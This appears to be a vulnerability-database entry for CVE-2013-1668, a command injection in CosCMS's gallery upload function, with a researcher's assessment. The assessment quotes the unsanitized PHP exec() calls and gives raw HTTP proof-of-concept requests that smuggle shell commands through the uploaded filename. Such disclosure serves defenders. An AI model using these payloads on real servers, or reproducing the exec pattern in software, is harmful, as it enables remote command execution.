CVE-2013-1668

The uploadFile function in upload/index.php in CosCMS before 1.822 allows remote administrators to execute arbitrary commands via shell metacharacters in the name of an uploaded file.

Recent assessments:

wchen-r7 at September 12, 2019 6:08pm UTC reported:

• In fact, doesn’t seem like the user should be authenticated at all. Looking at this request:

  POST /gallery/upload/index HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------21456260222104
  Content-Length: 970
  -----------------------------21456260222104
  Content-Disposition: form-data; name=“title”
  1
  -----------------------------21456260222104
  Content-Disposition: form-data; name=“image_add”
  1
  -----------------------------21456260222104
  Content-Disposition: form-data; name=“description”
  1
  -----------------------------21456260222104
  Content-Disposition: form-data; name=“tags”

  -----------------------------21456260222104
  Content-Disposition: form-data; name=“MAX_FILE_SIZE”
  100000000
  -----------------------------21456260222104
  Content-Disposition: form-data; name=“APC_UPLOAD_PROGRESS”
  511ad0922b50f
  -----------------------------21456260222104
  Content-Di sposition: form-data; name=“file”; filename=“1 & ls -la > file.txt”
  Content-Type: application/octet-stream
  1
  -----------------------------21456260222104
  Content-Disposition: form-data; name=“submit”
  Update
  -----------------------------21456260222104–

According to my testing, really authentication isn’t needed to reach the vulnerable code.

• Vulnerability: The vulnerable resides on modules/gallery/upload/index.php, in the uploadFile() function, where
  $exec is called with partially user controlled data:

  $command = “mv " . $_FILES[‘file’][‘tmp_name’] . " $zip”;
  //die;
  exec ($command, $output = array (), $res);

  $command = "chmod 777 " . $zip;
  exec ($command, $output = array (), $res);

  $command = "unzip -o -UU " . $zip;
  exec ($command, $output = array (), $res);

The $zip variable can be partially controlled:

$zip = "/tmp/" . $_FILES['file']['name'];

Since $_FILES[‘file’][‘name’] is used for injection “/” is a badchar, which makes exploitation (of something usefull) really difficult:

1. Execution is with www-data privileges by default, not a lot of things to do.

2. You are executing from modules/gallery/upload where by default, and in the recommended installation user hasn’t privileges for writting. So
   the provided PoC by htbridge doesn’t work at all in a default installation:

   Content-Di sposition: form-data; name=“file”; filename=“1 & ls -la > file.txt”

You cannot write file.txt in modules/gallery/upload by default.

My PoC:

POST /gallery/upload/index HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/gallery/view/1
Content-Type: multipart/form-data; boundary=---------------------------1107861128371857341391966473
Content-Length: 360

-----------------------------1107861128371857341391966473
Content-Disposition: form-data; name="file"; filename="ls; <COMMAND>"
Content-Type: text/plain

msf.txt

-----------------------------1107861128371857341391966473
Content-Disposition: form-data; name="submit"

Upload File
-----------------------------1107861128371857341391966473--

Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0